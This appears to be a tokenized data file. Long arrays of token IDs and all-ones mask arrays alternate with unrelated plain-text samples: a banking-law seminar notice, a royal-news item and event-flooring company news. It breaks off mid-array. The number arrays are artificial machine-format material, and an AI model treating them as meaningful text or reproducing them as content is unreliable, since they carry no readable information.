1950, 28563, 293, 7171, 1860, 674, 2304, 596, 3058, 1017, 785, 450, 1098, 533, 366, 19531, 674, 505, 263, 19340, 7716, 2779, 297, 596, 8225, 29889, 910, 756, 1063, 28585, 491, 2846, 7405, 800, 2309, 599, 2820, 278, 15482, 915, 29889, 16972, 505, 28585, 393, 591, 4362, 278, 1959, 7171, 1860, 756, 263, 6374, 2779, 322, 366, 505, 263, 260, 5197, 304, 2189, 2253, 29889, 1281, 27284, 29892, 746, 366, 505, 278, 1959, 330, 799, 322, 366, 526, 591, 4362, 278, 1959, 7171, 1860, 29892, 278, 3058, 1017, 316, 455, 561, 414, 964, 2253, 8225, 29889, 13, 13, 7341, 8090, 1098, 533, 701, 629, 3076, 8225, 785, 7605, 292, 278, 1959, 1067, 6046, 338, 18853, 363, 738, 3748, 366, 1708, 29889, 1152, 1342, 29892, 263, 7303, 310, 2734, 17394, 267, 338, 4100, 363, 269, 11953, 29889, 15175, 29892, 896, 526, 451, 7829, 363, 7303, 310, 1422, 8090, 408, 896, 817, 7744, 3097, 29892, 3661, 292, 322, 14698, 9324, 607, 526, 3734, 363, 1422, 8090, 29889, 8502, 3538, 29892, 1098, 533, 393, 1518, 1379, 7901, 271, 515, 278, 3573, 1818, 367, 10434, 29889, 13, 13, 7364, 1598, 15058, 12837, 7344, 29879, 263, 16650, 293, 5418, 515, 18658, 322, 7805, 1663, 18541, 785, 3118, 310, 278, 15281, 9590, 310, 8090, 4475, 281, 3885, 338, 278, 3667, 2133, 310, 28503, 3730, 25890, 8090, 330, 799, 29889, 1152, 2777, 3667, 2133, 310, 17394, 267, 393, 1016, 30010, 29873, 6216, 7128, 2486, 1122, 4556, 12220, 567, 29892, 7115, 793, 470, 1584, 560, 375, 573, 29889, 19814, 777, 310, 963, 1122, 1996, 3667, 2133, 310, 14219, 13574, 1462, 944, 29879, 304, 7952, 3448, 515, 2814, 281, 3885, 29889, 739, 338, 21003, 544, 10385, 304, 1735, 596, 17394, 267, 297, 278, 281, 1296, 310, 3667, 5281, 963, 363, 29871, 29946, 29900, 29900, 304, 29871, 29945, 29900, 29900, 7800, 29889, 13, 13, 1576, 5849, 310, 278, 3573, 26371, 2925, 746, 366, 19531, 278, 14828, 479, 25890, 7171, 1860, 785, 739, 338, 10112, 1230, 393, 278, 7171, 1860, 366, 19531, 2367, 366, 15130, 310, 5849, 411, 694, 298, 513, 661, 778, 29889, 3575, 528, 2728, 470, 596, 3273, 29879, 12722, 451, 367, 2086, 19932, 393, 1970, 1475, 596, 5849, 3643, 881, 896, 367, 2086, 3889, 393, 896, 269, 3466, 1269, 931, 366, 11672, 29892, 2507, 470, 8171, 29889, 13, 13, 9526, 12959, 7171, 1860, 763, 3538, 18443, 267, 366, 304, 1162, 1132, 515, 738, 18658, 1156, 15058, 785, 4525, 12959, 10714, 5162, 11057, 10416, 3236, 29889, 910, 23588, 10416, 3236, 1549, 2301, 7799, 1518, 1379, 278, 425, 20009, 1034, 1883, 573, 607, 338, 2825, 28655, 15058, 29889, 7857, 29892, 278, 22869, 362, 310, 278, 3573, 3079, 1860, 322, 9263, 2129, 278, 7736, 29879, 310, 2534, 269, 487, 322, 2898, 6419, 2301, 7799, 29889, 399, 799, 292, 310, 12959, 623, 17243, 4076, 385, 1399, 391, 6202, 728, 519, 10879, 515, 14051, 10549, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Practising Law Institute: Banking Law Update 2009: Shaping the Future of the Financial Services System This seminar, presented by PLI, will focus on thefundamental transformations to the operations and oversight of the financial system thatthe U.S. Congress and Administration have begun to make in response to last year's global financial crises. This program will provide important context for those seeking to understand the financial crisis as well as an update on the fundamental regulatory and legislative changes that are reshaping our financial system. Senior executives, legal and compliance staff, investment bankers, outside counsel, others involved with domestic and international financial institutions, as well as individuals seeking a better understanding of banking law will benefit from this program. WilmerHale counsel Sara Kelsey will be a featured speaker at this event. She will speak on the panel entitled "The Reorganization of Financial Supervision." Notice Unless you are an existing client, before communicating with WilmerHale by e-mail (or otherwise), please read the Disclaimer referenced by this link.(The Disclaimer is also accessible from the opening of this website). As noted therein, until you have received from us a written statement that we represent you in a particular manner (an "engagement letter") you should not send to us any confidential information about any such matter. After we have undertaken representation of you concerning a matter, you will be our client, and we may thereafter exchange confidential information freely.
[ 1, 29124, 5921, 7927, 8907, 29901, 10253, 292, 7927, 10318, 29871, 29906, 29900, 29900, 29929, 29901, 1383, 21430, 278, 16367, 310, 278, 4231, 273, 1455, 15538, 2184, 13, 13, 4013, 3031, 18220, 29892, 9132, 491, 349, 5265, 29892, 674, 8569, 373, 278, 27159, 11491, 29304, 304, 278, 6931, 322, 288, 874, 523, 310, 278, 18161, 1788, 393, 1552, 501, 29889, 29903, 29889, 11559, 322, 23303, 505, 23580, 304, 1207, 297, 2933, 304, 1833, 1629, 29915, 29879, 5534, 18161, 2181, 4637, 29889, 910, 1824, 674, 3867, 4100, 3030, 363, 1906, 25738, 304, 2274, 278, 18161, 24161, 408, 1532, 408, 385, 2767, 373, 278, 15281, 24378, 7606, 322, 13332, 1230, 3620, 393, 526, 620, 29882, 21430, 1749, 18161, 1788, 29889, 24260, 6704, 3145, 29892, 11706, 322, 752, 13036, 13925, 29892, 13258, 358, 9124, 414, 29892, 5377, 2613, 2838, 29892, 4045, 9701, 411, 21849, 322, 6121, 18161, 21561, 29892, 408, 1532, 408, 15724, 25738, 263, 2253, 8004, 310, 9124, 292, 4307, 674, 14169, 515, 445, 1824, 29889, 13, 13, 29594, 1050, 29950, 744, 2613, 2838, 317, 2518, 476, 2870, 29891, 674, 367, 263, 15000, 25657, 472, 445, 1741, 29889, 2296, 674, 7726, 373, 278, 9451, 23437, 376, 1576, 830, 6388, 2133, 310, 4231, 273, 1455, 5670, 4924, 1213, 13, 13, 3664, 625, 13, 13, 2525, 2222, 366, 526, 385, 5923, 3132, 29892, 1434, 7212, 1218, 411, 4624, 1050, 29950, 744, 491, 321, 29899, 2549, 313, 272, 6467, 511, 3113, 1303, 278, 8565, 433, 4193, 16180, 491, 445, 1544, 14030, 1576, 8565, 433, 4193, 338, 884, 15579, 515, 278, 8718, 310, 445, 4700, 467, 1094, 11682, 727, 262, 29892, 2745, 366, 505, 4520, 515, 502, 263, 3971, 3229, 393, 591, 2755, 366, 297, 263, 3153, 8214, 313, 273, 376, 996, 5049, 5497, 1159, 366, 881, 451, 3638, 304, 502, 738, 24332, 616, 2472, 1048, 738, 1316, 4383, 29889, 2860, 591, 505, 22332, 9424, 8954, 310, 366, 19813, 263, 4383, 29892, 366, 674, 367, 1749, 3132, 29892, 322, 591, 1122, 727, 7045, 14523, 24332, 616, 2472, 28472, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Let's talk royals Duchess of Cambridge Nails First RAF Engagement as Honorary Air Commandant Today marked a significant milestone for the Duchess of Cambridge, who attended her first official engagement as Honorary Air Commandant of the RAF Air Cadets. Catherine arrived at RAF church St Clement Danes for a service, before attending a reception at the Royal Courts of Justice to mark the 75th anniversary year of the RAF Air Cadets. The Duke of Edinburgh passed on his patronage to Catherine just before Christmas, after 63 years as Air Commodore-In-Chief. For the occasion, Her Royal Highness wore a bespoke Alexander McQueen coat, a piece first spotted at a 2014 aviation event in New Zealand, and a few months later for D-Day commemoration in France in 2014. Neil Warner / Splash News The Evening Standard called the coat’s color “Air Force Blue,” quite fitting given the events for which Catherine selected it. UPDATE: Fellow royal enthusiast @clairehurrell clarified that the McQueen coat was too light to be air force blue. The actual shade looks like this. If I’m correct, Prince William wore it on Remembrance Sunday, having served with the Royal Air Force.
[ 1, 2803, 29915, 29879, 5193, 20258, 1338, 13, 13, 29928, 987, 404, 310, 12585, 405, 2234, 3824, 390, 5098, 2201, 5049, 408, 18236, 653, 5593, 10516, 424, 13, 13, 29911, 397, 388, 10902, 263, 7282, 2316, 27744, 363, 278, 23568, 404, 310, 12585, 29892, 1058, 14283, 902, 937, 6221, 3033, 5049, 408, 18236, 653, 5593, 10516, 424, 310, 278, 390, 5098, 5593, 21542, 1691, 29889, 13, 13, 29907, 16490, 11977, 472, 390, 5098, 6586, 624, 26769, 3951, 267, 363, 263, 2669, 29892, 1434, 1098, 2548, 263, 25647, 472, 278, 7021, 6325, 1372, 310, 17181, 304, 2791, 278, 29871, 29955, 29945, 386, 6957, 27547, 1629, 310, 278, 390, 5098, 5593, 21542, 1691, 29889, 13, 13, 1576, 13484, 310, 25200, 4502, 373, 670, 18259, 482, 304, 21688, 925, 1434, 17661, 29892, 1156, 29871, 29953, 29941, 2440, 408, 5593, 422, 1545, 487, 29899, 797, 29899, 1451, 2575, 29889, 13, 13, 2831, 278, 10039, 29892, 2439, 7021, 5057, 2264, 26758, 263, 3008, 1129, 446, 9428, 4052, 8654, 264, 24296, 29892, 263, 8424, 937, 805, 15048, 472, 263, 29871, 29906, 29900, 29896, 29946, 1029, 11685, 1741, 297, 1570, 13450, 29892, 322, 263, 2846, 7378, 2678, 363, 360, 29899, 12742, 844, 331, 12418, 297, 3444, 297, 29871, 29906, 29900, 29896, 29946, 29889, 13, 13, 8139, 309, 26699, 847, 317, 572, 1161, 10130, 13, 13, 1576, 7753, 292, 10117, 2000, 278, 24296, 30010, 29879, 2927, 1346, 29909, 381, 11004, 10924, 3995, 3755, 28221, 2183, 278, 4959, 363, 607, 21688, 4629, 372, 29889, 13, 13, 14474, 29901, 25940, 15150, 23644, 15736, 732, 16398, 533, 29882, 332, 15044, 7542, 2164, 393, 278, 4052, 8654, 264, 24296, 471, 2086, 3578, 304, 367, 4799, 4889, 7254, 29889, 450, 3935, 528, 1943, 3430, 763, 445, 29889, 13, 13, 3644, 306, 30010, 29885, 1959, 29892, 10787, 4667, 26758, 372, 373, 5240, 1590, 11115, 16340, 29892, 2534, 6766, 411, 278, 7021, 5593, 11004, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Latest News Late December’s wet weather caused many high profile events to be cancelled but not for a special wedding in Leicestershire. Event Flooring Solutions (EFS) were tasked to ensure that a wonderful wedding and reception took place no matter whatever the weather. Working with GL Events EFS quickly visited the sited for a survey to assess the topography and overall logistics involved – the brief was simple “This wedding has to take place – failure is not an option!” The on site survey showed that access was critical, the field was located along a narrow country drive which meant un-loading from normal transport onto smaller vehicles and by hand. EFS organised lighter vehicles and forklifts to provide the ideal access to the site co-ordinated by EFS staff. Initially the key criteria was to provide access across the field for the support staff of GL Events to unload the marquee structure and support facilities. Additionally vehicular access was essential for the suppliers and sub contractors to construct and service the wedding marquee, finally given the wet weather access and parking for the guests was requested. For this essential work EFS staff installed 1100m² of their Hex Road product - light, flexible and able to allow for heavy loads, this was ideal for both site access and protection of the ground beneath, also allowing an ideal work platform for support staff and vehicle standing. Hex Road was also used around the site as access to on site parking, given the flexibility of Hex Road EFS were able to install additional spurs off the main road way to provide and maximise the number of parking spaces available. As the continued heavy rain fell and with several last minute urgent phone calls, it quickly became apparent that additional protection was required for the field in which the cars were parked. Given that this was the “Friday before Christmas” and new stock was required on site, EFS managed to arrange for several small vehicles to collect and deliver new product direct to the site. EFS staff were contacted and arrived on site in time to install 700m² of their Temp-A-Road product to in-fill and provide a firm parking area within the road spurs. As a final touch, EFS arranged for both the Hex Road and Temp-A-Road to be cleaned using mechanical sweepers and individual jet washing from mobile bowsers with on-site staff. This beautiful event took place with no hitches from the weather and thanks to EFS they were able to “Spare the bride’s blushes”! As the leading specialists in portable flooring, Event Flooring Solutions (EFS) supplied and installed their complete range of flooring solutions for the UK's leading agricultural machinery, equipment and farm services show - LAMMA at Newark this year. More than 4,500m² of Hex Road was installed as extra internal roadways linking the marquees to the main walkways whilst also providing hard standing areas around the site. Additionally – in excess of 1,000m² of the specialist Temp-A-Path® flooring was provided and installed as a hard standing area and walkway around stands for customers such as, Claas, John Deere and Nat West. Finally EFS provided exhibition carpeting – for more than 70 stands – both indoors and outside. Once again we were asked to provide and install temporary walkways and hard standing areas for the annual Lincoln Christmas market. Having designed the layout for the market several years ago, we are always delighted to be asked to undertake this exciting festive project. As a national heritage site it is critical that due care, attention and diligence is paid to the surrounding areas both within the Castle grounds and also the neighbouring gardens. We selected EFS Temp-A-Path® as the ideal solution for this bespoke installation within the selected areas, protecting the grounds of this historical site and allowing access for pedestrians and vehicles alike. Site installation details for the Temp-A-Path® product are as follows:- • Within the Castle grounds, we supplied and installed 2,300m² which protected the lawned area and also provided a walkway to other venues. • For the insides of the sales marquees in the surrounding Gardens we installed 360m² • Additionally we laid 500m² around the surrounding areas as temporary walkways. With over 250,000 people attending the Christmas Market over 4 days in December, Lincoln is regarded as the largest Christmas event of its kind. For this year’s annual medieval Christmas market we were asked by Dakin Events to provide protective flooring for both inside and outside of the Castle keep. Our products offered protection for the grounds and lawns whilst also providing safe walkways throughout the site. For the build up of the marquees and general access areas we supplied and installed 500m² of Hex Road – this was largely outside of the Castle Keep. Whilst within the Castle walls, for the stallholders, entertainers and visitors, we supplied and installed 1,400m² of our Temp-A-Path® product. The annual Medieval Christmas Fayre in Ludlow is described as the best medieval show in the land with over 100 stalls selling seasonal gifts with a distinct medieval flavour. This year’s weekend event attracted more music, minstrels, merriment and mirth than ever before and was certainly a great treat for all of the family, set within the glorious grounds of the medieval Ludlow Castle. We were delighted to be awarded for the second year running the contract to provide a solution for the 9th annual Christmas Fayre in Bury St Edmunds. The tourist office (part of the borough council), contacted us with regards to protecting the historic lawns and gardens, providing floor areas for stalls and entertainers, whilst working under severe time parameters. Temp-A-Path® was selected as the most practical and versatile product for installation and uplift. In total 1,700m² of the product was installed protecting the grass from pedestrian foot fall and trade stands. The time issues were critical for the council given that the location was within the Abbey walls on the lawns and gardens where no mechanical trucks or forklifts were allowed. The lorry had to be manually unloaded by 6 am, with the stock then transported on pallet trucks across the main road and into the gardens prior to the daily rush hour. For the uplift of Temp-A-Path® , the team started work at 9pm and, with the assistance of floodlights, working through the night they managed to have the return lorry Loaded and sent away by 6am. Bury St Edmunds Christmas Fayre has non-stop entertainment for three days with many different groups, schools and charities performing. The Christmas Fayre is now famous for its entertainment. With two stages, children’s entertainment and street entertainers, there is something for everyone. EFS were proud to work, on behalf of the Leicester Mayor’s office to supply and install over 1,000m² of Temp-A-Path® for the remembrance service at the War Memorial in Leicester’s Victoria Park. Following an on site meeting earlier in the year, EFS were able to design the optimum fit for the service and wreath laying. It enabled the best use of Temp-A-Path to be laid within the area provided. Temp-A-Path® was selected from the bidding process as being the most cost effective and flexible product available for this event. The key objectives were to provide a safe platform for the service as well as protecting the memorial gardens and grounds. With over 3,500 participants attending hymns and prayers were sang and said with proud veterans standing shoulder to shoulder with young cadets under a brilliant blue sky to pay their respects to fallen soldiers. For the second year running EFS were appointed by Ignite Music & Entertainment Ltd to supply and fit the flooring area within the Player’s Hospitality area at the recent 2012 ATP Tennis Tournament in London’s O2 Arena. This event is the biggest indoor tennis tournament in the world featuring Novak Djokovic, Roger Federer, Andy Murray and a wealth of other stars. The project involved laying wood effect vinyl in both the Players lounge and restaurant sections. This technically challenging work involved bonding the vinyl to the plywood flooring and cutting around many pillars to the precise design supplied. The work was completed over 2 days to enable the fit out to take place. Jeremy Simpson – Business Development Manager for EFS commented, ”Following our initial work with Ignite in 2011 it was great to be re-awarded the contact for 2012 for this prestigious tournament and iconic venue. As a company we have grown significantly during our first year and repeat business like this proves that we have the products and service that the market expects and requires.” Working on behalf of Bright White Ltd, Event Flooring Solutions (EFS) have provided temporary flooring for the Illuminating York Festival. The festival runs Wednesday 31 October until Saturday 3 November. EFS created a working pad for an articulated lorry using 130m² of their Hex Road product along with providing temporary walkways and disabled access areas throughout the museum grounds using 400m² of Temp-A-Path® . Both products provide ideal safe flooring environments which also providing ideal protection for the grounds themselves. EFS Business Development Manager Jeremy Simpson commented “This is a new project for us and we are delighted that our products were chosen.” He added “This is the start of a busy few months for EFS and we look forward to more diverse opportunities for our product range”. This will be York’s largest Illuminating York Festival yet, with comedian Vic Reeves given a free reign to unleash his absurd and magical creations in the centre of York. Last year’s event saw 60,000 people flock to the festival, and as well as three large scale projections, the botanical gardens will also be brought to magical life using innovative lighting around trees and plants. The York Museum Gardens have been transformed into a ten acre magical wonderland for the return of Illuminating York. Where the old world meets new, as the hauntingly beautiful ruins of St Mary’s Abbey, the stunning facade of the Yorkshire Museum and part of the City Walls provide the backgrounds to three large scale cutting edge projections. Lincoln Market At Lincoln Christmas market last year, we laid over 2,500m² of Temp-A-Path® to protect the grounds within the castle from the high footfall over the 4 days of the event and also critically during the site construction and dis-mantling. Ludlow Fayre We were asked to provide both our Temp-A-Path® and Hex Road products for last years event at Ludlow Medieval Christmas Fayre in Shropshire. Bury St Edmunds For last years event, we laid 1,400m² of Temp-A-Path® for the stalls and entertainers as well as protecting the historic gardens. Christmas Ice Rinks Our club gel-backed heavy duty carpet is being used at over 30 outdoor Ice Rinks all over the UK this Christmas We were approached by the organisers of this 3 day festival to create temporary pedestrian access to the park in South Birmingham. With rain forecast for 2 of the days it was vital to protect the grounds and provide a safe access road. EFS staff installed 100m² of Temp-A-Path® . The festival featured the return of Echo and the Bunnymen and was a sell out for the 3 days with thousands of delighted festival goers. For a private party at this iconic and unique location on the rooftop of the old Barkers store in High Street Kensington, Evolve Events asked us to supply and fit a white carpet on top of the existing carpeted areas. Being pure white the carpet also had to be protected after installation and prior to the party to allow contractors to access and work on the party build up. We supplied our White Podium Flat carpet with a polythene protection layer attached; this carpet was then stuck to the existing carpet using our EFS lock lift tape. Access to the location and then to the roof top itself is challenging but we were delighted with the results. Kambe Events appointed us for the second year to provide and install temporary flooring for the festival site and camping areas at Kelmarsh Hall in Northamptonshire. For general vehicle access both to and around the site we installed 1060m² of Hex Road , this was also used to create a hard standing Bus Park within the grounds of the hall. For the toilets and showers facilities we installed 500m² of Temp-A-Path® in 6 separate locations around the site. Shambala takes place for 4 days over the Bank Holiday weekend and described by The Independent as "In a nutshell- energetic, playful, bonkers, theatrical, green” we were delighted to be able to assist again and look forward to 2013 An additional request for this event from Concert Clinic was to protect the newly laid carpet within the De Montfort Hall. This carpet costing over £85,000 could not be removed and festival goers were expected to attend events within the auditorium. We recommend our Caterer Floor sheeting as the best option. The product is hard wearing, flame retardant and easy clean white polythene sheeting which is an ideal economic alternative to vinyl flooring. To cover the carpets in the hall we supplied and installed 3 rolls 2m x 100m which provided complete protection from the mud and day to day dirt. Following the success of the 2011 Summer Sundae festival, Concert Clinic asked us to provide our temporary flooring products for the 2012 event. Based at Leicester’s De Montfort hall this annual show takes place in a variety of themed marquees, main outdoor stage and the hall itself. Concert Clinic wanted the products to be installed by their own staff and so ease of usage and installation was vital. For the roadways around the site we provided 650m² of Hex Road , this allowed contractors vehicles, event traffic as well as festival goers to move around the site in safety. Additionally it protected the grounds of the historic hall and parkland from wear and tear. Within the specialist marquees and big top we provided 350m² of Temp-A-Path . The sheets are easily to manoeuvre and install which assisted the voluntary staff who laid the flooring. Summer Sundae is an annual event in Leicester’s event calendar, held over 4 days and this year it attracted a number of high profile acts – Adam Ant, Ocean Colour Scene and Public Image Ltd. Following many previous years successful protection of the University grounds, we were pleased to be re-awarded the contract for this important annual graduation event. With over 4,000 students a day attending over a 4 week duration we supplied and installed 1,500m² of Hex Road , 750m² of Temp-A-Road and 500m² of Temp-A-Path® . Each of our flexible products was put to good use on the University grounds for protection, parking, roadways and additionally flooring within the support marquees. Following a month’s constant rain the products proved to be the ideal protection for the grounds and to assist with the constant traffic – both pedestrian and vehicles. As part of the Graduation event for the University we were also asked to provide protection for the recently installed sports hall flooring. The brief from the University was to protect the newly installed floor with a suitable carpet barrier onto which seating would be placed. This bi-annual international exhibition held at Hillhead quarry in Buxton,Derbyshire allows suppliers to the quarrying industry the perfect “Real World” arena to demonstrate and promote their products. This year’s event attracted over 17,000 visitors – a 10% increase on Hillhead 2011, throughout the three days of the show they experienced more live demonstrations and new plant & equipment than ever before, presented by a record 459 exhibitors. We supplied our Temp-A-Path® product in this challenging environment to 14 exhibitors for use on and providing safe access to their stands, additionally the product was used for general hard standing areas. The award winning Eco house designed and built by students at the University was given its own unique location within the grounds, following a stint within an exhibition environment. The area chosen was however, within University parkland 133m from the nearest road with an incline of over 22m. To install the modular based house onto its new area would require 4 separate articulated lorry loads and a stable area for a mobile crane to operate. Working with the Estates department we were asked to provide a temporary product which would not only allow access for the crane and associated vehicles but would also protect the grounds beneath. We installed 600m² of Hex Road and Geo Membrane to provide the temporary roadway and working platform. Following a month’s constant rain the products proved to be the ideal protection for the grounds and were quick and easy to install and remove. As part of their sponsorship of the 2012 Olympic Games, Coca Cola arranged a series of outdoor concerts around the UK. These free shows featured diverse acts as Mark Ronson, Emeli Sande, Eliza Doolittle and Dizzee Rascal promoting the games. We were contacted by Leeds council to provide a flooring solution for the site both front of house and also back stage. As both of the areas were to be installed by local staff it was important to provide a simple and easy to use system. For the backstage areas we supplied 100m² of Temp-A-Path® for walkways and for the main area we supplied 600m² of Hex Road with Geo membrane to protect the ground. Both items were installed and removed by The Leeds Council Events Team.
[ 1, 7053, 342, 10130, 13, 13, 29931, 403, 5846, 30010, 29879, 7990, 14826, 8581, 1784, 1880, 8722, 4959, 304, 367, 12611, 839, 541, 451, 363, 263, 4266, 14837, 8497, 297, 951, 293, 28910, 14812, 29889, 6864, 26043, 8253, 4956, 17925, 313, 29923, 9998, 29897, 892, 3414, 287, 304, 9801, 393, 263, 20695, 14837, 8497, 322, 25647, 3614, 2058, 694, 4383, 6514, 278, 14826, 29889, 24176, 411, 12729, 28488, 382, 9998, 9098, 16669, 278, 269, 1573, 363, 263, 18994, 304, 24809, 278, 2246, 5275, 322, 12463, 1480, 6765, 9701, 785, 278, 11473, 471, 2560, 1346, 4013, 14837, 8497, 756, 304, 2125, 2058, 785, 10672, 338, 451, 385, 2984, 8530, 450, 373, 3268, 18994, 10018, 393, 2130, 471, 12187, 29892, 278, 1746, 471, 5982, 3412, 263, 12474, 4234, 7899, 607, 6839, 443, 29899, 13234, 515, 4226, 8608, 11480, 7968, 24413, 322, 491, 1361, 29889, 382, 9998, 2894, 3368, 301, 14643, 24413, 322, 363, 6321, 17741, 304, 3867, 278, 10839, 2130, 304, 278, 3268, 1302, 29899, 4194, 630, 491, 382, 9998, 13925, 29889, 17250, 368, 278, 1820, 16614, 471, 304, 3867, 2130, 4822, 278, 1746, 363, 278, 2304, 13925, 